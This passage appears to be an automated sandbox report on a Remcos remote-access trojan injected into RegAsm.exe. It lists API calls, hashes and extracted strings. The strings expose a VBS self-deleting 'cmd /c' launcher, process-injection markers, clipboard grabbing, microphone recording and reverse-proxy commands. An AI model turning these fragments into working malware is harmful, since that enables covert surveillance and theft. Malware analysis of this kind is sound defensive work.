                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                                                                                        • String ID: """, 0$.vbs$8SG$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
                                                                                                        • API String ID: 1913171305-3159800282
                                                                                                        • Opcode ID: 56d1356c42dc7fa533c5c42bb4693ab64f4e1a1f048b498cab8c93b269848ee8
                                                                                                        • Instruction ID: 6f299f75ad759bd4c56b3f4cab90e5e1fe41ff60d22e8747b975e3d2bb757992
                                                                                                        • Opcode Fuzzy Hash: 56d1356c42dc7fa533c5c42bb4693ab64f4e1a1f048b498cab8c93b269848ee8
                                                                                                        • Instruction Fuzzy Hash: 9B4129719001155ACB15FBA2DC56DEEB778AF50709F10017FB10AB21E2FF785E8ACA98
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _free
                                                                                                        • String ID:
                                                                                                        • API String ID: 269201875-0
                                                                                                        • Opcode ID: f91d4b90763e5671f10523a72ee64b05bbc7cd6159c247d47fb1287d0ca389aa
                                                                                                        • Instruction ID: 80ca3ff3fa16d46db3e6ae4c9b8471dba03f652ca918f9f25067e0b92ee87d4d
                                                                                                        • Opcode Fuzzy Hash: f91d4b90763e5671f10523a72ee64b05bbc7cd6159c247d47fb1287d0ca389aa
                                                                                                        • Instruction Fuzzy Hash: 30C183B6D40204ABEB20DBA9CC43FDE77F8AB09705F150166FE04EB283D6B49D459768
                                                                                                        APIs
                                                                                                          • Part of subcall function 00455929: CreateFileW.KERNEL32(00000000,00000000,?,00455D04,?,?,00000000), ref: 00455946
                                                                                                        • GetLastError.KERNEL32 ref: 00455D6F
                                                                                                        • __dosmaperr.LIBCMT ref: 00455D76
                                                                                                        • GetFileType.KERNEL32 ref: 00455D82
                                                                                                        • GetLastError.KERNEL32 ref: 00455D8C
                                                                                                        • __dosmaperr.LIBCMT ref: 00455D95
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00455DB5
                                                                                                        • CloseHandle.KERNEL32(?), ref: 00455EFF
                                                                                                        • GetLastError.KERNEL32 ref: 00455F31
                                                                                                        • __dosmaperr.LIBCMT ref: 00455F38
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                        • String ID: H
                                                                                                        • API String ID: 4237864984-2852464175
                                                                                                        • Opcode ID: 3e80e4deedef708004bf5c1f14aafc2c87dd9643035db764e93b071d2df20022
                                                                                                        • Instruction ID: 7cd045c9b8f196398d23f94ba58010557f508cd7b58f44c29b3e784ccbbfb847
                                                                                                        • Opcode Fuzzy Hash: 3e80e4deedef708004bf5c1f14aafc2c87dd9643035db764e93b071d2df20022
                                                                                                        • Instruction Fuzzy Hash: 44A14532A106049FDF19AF68DC657BE3BA0EB06325F24015EEC11AB392D6398D1AC759
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _free
                                                                                                        • String ID: \&G$\&G$`&G
                                                                                                        • API String ID: 269201875-253610517
                                                                                                        • Opcode ID: fb4e3dbc149d2c7ead481d14af816bdca3ff316622b678324ba67e9487465dd6
                                                                                                        • Instruction ID: 59c4f5d9f803fa3be21c2588ad204ea2c1e8261bb9e1a4607c4596bf86990b35
                                                                                                        • Opcode Fuzzy Hash: fb4e3dbc149d2c7ead481d14af816bdca3ff316622b678324ba67e9487465dd6
                                                                                                        • Instruction Fuzzy Hash: 86610E75900205AFDB21DF69C842B9ABBF4EF06710F24426BED44EB242E774AD45CB58
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 65535$udp
                                                                                                        • API String ID: 0-1267037602
                                                                                                        • Opcode ID: 92e56e7e39f2557d79d3192c533dec3724d183fd0175ec4c26052f24408cebce
                                                                                                        • Instruction ID: a9902b4e2b63063b067a15c036b171ad6d3a8658db747517b03e91dd9f9ead29
                                                                                                        • Opcode Fuzzy Hash: 92e56e7e39f2557d79d3192c533dec3724d183fd0175ec4c26052f24408cebce
                                                                                                        • Instruction Fuzzy Hash: FB51D431605301ABDB609B14E905BFB77E8ABC5754F08042FF88597390E76CCCC1969E
                                                                                                        APIs
                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A912
                                                                                                        • GetLastError.KERNEL32(?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A91F
                                                                                                        • __dosmaperr.LIBCMT ref: 0043A926
                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A952
                                                                                                        • GetLastError.KERNEL32(?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A95C
                                                                                                        • __dosmaperr.LIBCMT ref: 0043A963
                                                                                                        • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401D55,?), ref: 0043A9A6
                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A9B0
                                                                                                        • __dosmaperr.LIBCMT ref: 0043A9B7
                                                                                                        • _free.LIBCMT ref: 0043A9C3
                                                                                                        • _free.LIBCMT ref: 0043A9CA
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                                                                                        • String ID:
                                                                                                        • API String ID: 2441525078-0
                                                                                                        • Opcode ID: 1b21161869a1c6c97ce00f002d4111b93a94d55ba7b455788bfa216644d838f2
                                                                                                        • Instruction ID: 3a2165a63a30732921e8d6571a772c998230e0148124485b419b79488018c54b
                                                                                                        • Opcode Fuzzy Hash: 1b21161869a1c6c97ce00f002d4111b93a94d55ba7b455788bfa216644d838f2
                                                                                                        • Instruction Fuzzy Hash: 8631D5B180420AFBDF01AFA5CC45EAF3B6CEF09324F11451AF950662A1DB38CD61DB66
                                                                                                        APIs
                                                                                                        • SetEvent.KERNEL32(?,?), ref: 004054BF
                                                                                                        • GetMessageA.USER32 ref: 0040556F
                                                                                                        • TranslateMessage.USER32(?), ref: 0040557E
                                                                                                        • DispatchMessageA.USER32(?), ref: 00405589
                                                                                                        • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00474F78), ref: 00405641
                                                                                                        • HeapFree.KERNEL32(00000000,00000000,0000003B), ref: 00405679
                                                                                                          • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                                                                                        • String ID: CloseChat$DisplayMessage$GetMessage
                                                                                                        • API String ID: 2956720200-749203953
                                                                                                        • Opcode ID: cc8b7f28da1d764ad6cd9ccaf32cdfd21df96f63124541cf88ac6875447c82a2
                                                                                                        • Instruction ID: d37e718accd843302ceacc2187c81124e04698433963f5de03abd71ab6b9016f
                                                                                                        • Opcode Fuzzy Hash: cc8b7f28da1d764ad6cd9ccaf32cdfd21df96f63124541cf88ac6875447c82a2
                                                                                                        • Instruction Fuzzy Hash: 39419071A04301ABCB14FB76DC5A86F37A9AB85704F40493EF516A31E1EF3C8905CB9A
                                                                                                        APIs
                                                                                                          • Part of subcall function 00417F67: __EH_prolog.LIBCMT ref: 00417F6C
                                                                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,004660B4), ref: 00417E17
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00417E20
                                                                                                        • DeleteFileA.KERNEL32(00000000), ref: 00417E2F
                                                                                                        • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00417DE3
                                                                                                          • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
                                                                                                        • String ID: 0VG$0VG$<$@$Temp
                                                                                                        • API String ID: 1704390241-2575729100
                                                                                                        • Opcode ID: fdfef061a0c845b66634ed9213ec91d51d63ab98c4c1b6a43026fae5df42adc0
                                                                                                        • Instruction ID: 01f79aac078c9204ae4226344def03f9678a0966abb138ad227abf0e83d93267
                                                                                                        • Opcode Fuzzy Hash: fdfef061a0c845b66634ed9213ec91d51d63ab98c4c1b6a43026fae5df42adc0
                                                                                                        • Instruction Fuzzy Hash: 18417E319002099ACB14FB62DC56AEE7735AF00318F50417EF50A761E1EF7C5A8ACB99
                                                                                                        APIs
                                                                                                        • OpenClipboard.USER32 ref: 0041697C
                                                                                                        • EmptyClipboard.USER32 ref: 0041698A
                                                                                                        • CloseClipboard.USER32 ref: 00416990
                                                                                                        • OpenClipboard.USER32 ref: 00416997
                                                                                                        • GetClipboardData.USER32 ref: 004169A7
                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 004169B0
                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 004169B9
                                                                                                        • CloseClipboard.USER32 ref: 004169BF
                                                                                                          • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                                                                                                        • String ID: !D@
                                                                                                        • API String ID: 2172192267-604454484
                                                                                                        • Opcode ID: 504df0997904e7872ebe6ecfb3ee4e253f038a0ef8a597049df6207b31d9887a
                                                                                                        • Instruction ID: c3dc955394dadbf9cb8fa72aed918e4e170398eafb94270add22466952777bd7
                                                                                                        • Opcode Fuzzy Hash: 504df0997904e7872ebe6ecfb3ee4e253f038a0ef8a597049df6207b31d9887a
                                                                                                        • Instruction Fuzzy Hash: AA014C31204301EFC714BB72DC49AAE7BA5AF88742F40047EF906861E2DF388C45C659
                                                                                                        APIs
                                                                                                        • CreateFileMappingW.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 00413452
                                                                                                        • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00413460
                                                                                                        • GetFileSize.KERNEL32(?,00000000), ref: 0041346D
                                                                                                        • UnmapViewOfFile.KERNEL32(00000000), ref: 0041348D
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 0041349A
                                                                                                        • CloseHandle.KERNEL32(?), ref: 004134A0
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: File$CloseHandleView$CreateMappingSizeUnmap
                                                                                                        • String ID:
                                                                                                        • API String ID: 297527592-0
                                                                                                        • Opcode ID: 33a11f1d8b65504666c7f3d6a65dc1c7f241de2952f14d7c983c905d35a598f5
                                                                                                        • Instruction ID: 84c8eec30da1abd4ec43dfc3561b6153623c17c5959ee0fa3a13cc5c00e14cc2
                                                                                                        • Opcode Fuzzy Hash: 33a11f1d8b65504666c7f3d6a65dc1c7f241de2952f14d7c983c905d35a598f5
                                                                                                        • Instruction Fuzzy Hash: F041F331104301BBD7119F25EC49F6B3BACEFC9769F10052EF655D21A2DB38DA40866E
                                                                                                        APIs
                                                                                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABAD
                                                                                                        • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABC4
                                                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABD1
                                                                                                        • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABE0
                                                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABF1
                                                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABF4
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                        • String ID:
                                                                                                        • API String ID: 221034970-0
                                                                                                        • Opcode ID: 77d1dba04074bb5c0b27b9b0f176deadcb724c45256b7ec0605674b85678f877
                                                                                                        • Instruction ID: a7ddf6af562b27afc3fdb57d9320cc893b1711f81dd6882f7bac22400d97ef93
                                                                                                        • Opcode Fuzzy Hash: 77d1dba04074bb5c0b27b9b0f176deadcb724c45256b7ec0605674b85678f877
                                                                                                        • Instruction Fuzzy Hash: 1411E931501218BFD711AF64DC85CFF3B6CDB41B66B000426FA0692191EB689D46AAFA
                                                                                                        APIs
                                                                                                        • _free.LIBCMT ref: 004481B5
                                                                                                          • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000), ref: 00446818
                                                                                                          • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                                                                        • _free.LIBCMT ref: 004481C1
                                                                                                        • _free.LIBCMT ref: 004481CC
                                                                                                        • _free.LIBCMT ref: 004481D7
                                                                                                        • _free.LIBCMT ref: 004481E2
                                                                                                        • _free.LIBCMT ref: 004481ED
                                                                                                        • _free.LIBCMT ref: 004481F8
                                                                                                        • _free.LIBCMT ref: 00448203
                                                                                                        • _free.LIBCMT ref: 0044820E
                                                                                                        • _free.LIBCMT ref: 0044821C
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                        • String ID:
                                                                                                        • API String ID: 776569668-0
                                                                                                        • Opcode ID: 7409258e8d3de90c3944c0df00460aed843c684c15a9003062b0a9d40dd376ab
                                                                                                        • Instruction ID: 68a5115f29dd4dda1e04096f5587add38bc33a27c3b2fba9646c6a67a64c999e
                                                                                                        • Opcode Fuzzy Hash: 7409258e8d3de90c3944c0df00460aed843c684c15a9003062b0a9d40dd376ab
                                                                                                        • Instruction Fuzzy Hash: AA11E9B6901108BFDB01FF55C852CDD3B65FF05354B0244AAF9488F222DB75DE509B95
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Eventinet_ntoa
                                                                                                        • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$NG
                                                                                                        • API String ID: 3578746661-3604713145
                                                                                                        • Opcode ID: ae0a7b8144f0fccb272d8c7a190ddeadd1060d51cc801ec9eddceec8b6fa7371
                                                                                                        • Instruction ID: 5b49fc9f60f15aadef5e91219dcc0d557585a55aed20fbc46105045b647f8dc0
                                                                                                        • Opcode Fuzzy Hash: ae0a7b8144f0fccb272d8c7a190ddeadd1060d51cc801ec9eddceec8b6fa7371
                                                                                                        • Instruction Fuzzy Hash: 5351D531A042015BC714FB36D95AAAE36A5AB84344F40453FFA06676F2EF7C8985C7CE
                                                                                                        APIs
                                                                                                        • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,0045707F), ref: 00455FA7
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: DecodePointer
                                                                                                        • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                                                                        • API String ID: 3527080286-3064271455
                                                                                                        • Opcode ID: 91e2bc993b3a5d0be0d2963f4ae304432519259fdd54363bb3d88c255dc20ba7
                                                                                                        • Instruction ID: a80f67f54703b8f0c72b4cfac69ffbb6288a0afb30985e2ab5cebdbe3ffe6fde
                                                                                                        • Opcode Fuzzy Hash: 91e2bc993b3a5d0be0d2963f4ae304432519259fdd54363bb3d88c255dc20ba7
                                                                                                        • Instruction Fuzzy Hash: BB515071900909DBCF10DF58E9481BDBBB0FF49306F924197D841A7396DB798928CB1E
                                                                                                        APIs
                                                                                                        • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 00417530
                                                                                                          • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C52F
                                                                                                        • Sleep.KERNEL32(00000064), ref: 0041755C
                                                                                                        • DeleteFileW.KERNEL32(00000000), ref: 00417590
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: File$CreateDeleteExecuteShellSleep
                                                                                                        • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                                                                                        • API String ID: 1462127192-2001430897
                                                                                                        • Opcode ID: c5ffc7576fca46f67fe7a2dad330c9118b7d8c55f8f237e319bd0bae48937816
                                                                                                        • Instruction ID: 6598d36db715e58345e35b35962d03aab6dacf30af49f41f33489dbeb2d48940
                                                                                                        • Opcode Fuzzy Hash: c5ffc7576fca46f67fe7a2dad330c9118b7d8c55f8f237e319bd0bae48937816
                                                                                                        • Instruction Fuzzy Hash: 17313F71940119AADB04FB61DC96DED7735AF50309F00017EF606731E2EF785A8ACA9C
                                                                                                        APIs
                                                                                                        • GetCurrentProcess.KERNEL32(00472B14,00000000,004752D8,00003000,00000004,00000000,00000001), ref: 00407418
                                                                                                        • GetCurrentProcess.KERNEL32(00472B14,00000000,00008000,?,00000000,00000001,00000000,00407691,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe), ref: 004074D9
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CurrentProcess
                                                                                                        • String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir
                                                                                                        • API String ID: 2050909247-4242073005
                                                                                                        • Opcode ID: c959bd930998c8f390064940774d0a1512e2843fb7eeb626fe9b06c6253c3d56
                                                                                                        • Instruction ID: c8d37550e6f1e63eabf3c93e4c9511e0cbcdb01d3c289a22ccdf2b55afca88d7
                                                                                                        • Opcode Fuzzy Hash: c959bd930998c8f390064940774d0a1512e2843fb7eeb626fe9b06c6253c3d56
                                                                                                        • Instruction Fuzzy Hash: DE317EB1A44300ABD314EF65DD46F1677B8BB04705F10087EF509A6692EBB8B8458B6F
                                                                                                        APIs
                                                                                                        • _strftime.LIBCMT ref: 00401D50
                                                                                                          • Part of subcall function 00401A6D: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                                                                                                        • waveInUnprepareHeader.WINMM(00472A88,00000020,00000000), ref: 00401E02
                                                                                                        • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401E40
                                                                                                        • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401E4F
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                                                                                                        • String ID: %Y-%m-%d %H.%M$.wav$dMG$|MG
                                                                                                        • API String ID: 3809562944-243156785
                                                                                                        • Opcode ID: 631b70e71605f283cfdfcec03d03cf742693868e286b15c17712ccdca5938df0
                                                                                                        • Instruction ID: 12771182903f202c4b9d99511a6abf0f0559d076e6e3c56183b1657b5f9df8bc
                                                                                                        • Opcode Fuzzy Hash: 631b70e71605f283cfdfcec03d03cf742693868e286b15c17712ccdca5938df0
                                                                                                        • Instruction Fuzzy Hash: AA318F315043019FC324EB22DC56A9E77A8FB84315F40443EF189A21F2EFB89A49CB5E
                                                                                                        APIs
                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00410EA9
                                                                                                        • int.LIBCPMT ref: 00410EBC
                                                                                                          • Part of subcall function 0040E0FC: std::_Lockit::_Lockit.LIBCPMT ref: 0040E10D
                                                                                                          • Part of subcall function 0040E0FC: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E127
                                                                                                        • std::_Facet_Register.LIBCPMT ref: 00410EFC
                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00410F05
                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00410F23
                                                                                                        • __Init_thread_footer.LIBCMT ref: 00410F64
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_Init_thread_footerRegisterThrow
                                                                                                        • String ID: ,kG$0kG
                                                                                                        • API String ID: 3815856325-2015055088
                                                                                                        • Opcode ID: 0df5c5a73a4f0609ec37d72de2388ae496d2ae77879c5bcc00101055df3a6b79
                                                                                                        • Instruction ID: 6b7561e6e5701aa818233467e21ea388c72e3112cb5a37ed7db11c94fdfc7bf8
                                                                                                        • Opcode Fuzzy Hash: 0df5c5a73a4f0609ec37d72de2388ae496d2ae77879c5bcc00101055df3a6b79
                                                                                                        • Instruction Fuzzy Hash: 682129329005249BCB14FB6AD8429DE77A9DF48324F21416FF404E72D1DFB9AD818B9D
                                                                                                        APIs
                                                                                                        • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00401BF9
                                                                                                        • waveInOpen.WINMM(00472AC0,000000FF,00472AA8,Function_00001D0B,00000000,00000000), ref: 00401C8F
                                                                                                        • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401CE3
                                                                                                        • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401CF2
                                                                                                        • waveInStart.WINMM ref: 00401CFE
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                                                                                                        • String ID: dMG$|MG$PG
                                                                                                        • API String ID: 1356121797-532278878
                                                                                                        • Opcode ID: e77b4b4e4653ae7db2ffa9ad3e4c491b15162175c47f56b782ba1ea702525e8d
                                                                                                        • Instruction ID: 1e392cdedf79dd274444ae0cc0b76d6cc185fd36309c60cea9b16e967c73269b
                                                                                                        • Opcode Fuzzy Hash: e77b4b4e4653ae7db2ffa9ad3e4c491b15162175c47f56b782ba1ea702525e8d
                                                                                                        • Instruction Fuzzy Hash: 51212A71604201AFC7399F66EE15A6A7BB6FB94715B00803FA10DD76B1DBB84881CB5C
                                                                                                        APIs
                                                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041D507
                                                                                                          • Part of subcall function 0041D5A0: RegisterClassExA.USER32 ref: 0041D5EC
                                                                                                          • Part of subcall function 0041D5A0: CreateWindowExA.USER32 ref: 0041D607
                                                                                                          • Part of subcall function 0041D5A0: GetLastError.KERNEL32 ref: 0041D611
                                                                                                        • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041D53E
                                                                                                        • lstrcpynA.KERNEL32(00474B60,Remcos,00000080), ref: 0041D558
                                                                                                        • Shell_NotifyIconA.SHELL32(00000000,00474B48), ref: 0041D56E
                                                                                                        • TranslateMessage.USER32(?), ref: 0041D57A
                                                                                                        • DispatchMessageA.USER32(?), ref: 0041D584
                                                                                                        • GetMessageA.USER32 ref: 0041D591
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                                                                                        • String ID: Remcos
                                                                                                        • API String ID: 1970332568-165870891
                                                                                                        • Opcode ID: bb528cd859a2941ef755fedfca18549d942758f832e9eaa985f33bd327a59cbd
                                                                                                        • Instruction ID: 0a96d410cd687733bc2db9baaca44b2a156926270a6f860d3af68fdb0bcdced8
                                                                                                        • Opcode Fuzzy Hash: bb528cd859a2941ef755fedfca18549d942758f832e9eaa985f33bd327a59cbd
                                                                                                        • Instruction Fuzzy Hash: CA0152B1840244EBD7109FA5EC4CFABBB7CEBC5705F00406AF515931A1D778D885CB58
                                                                                                        Memory Dump Source
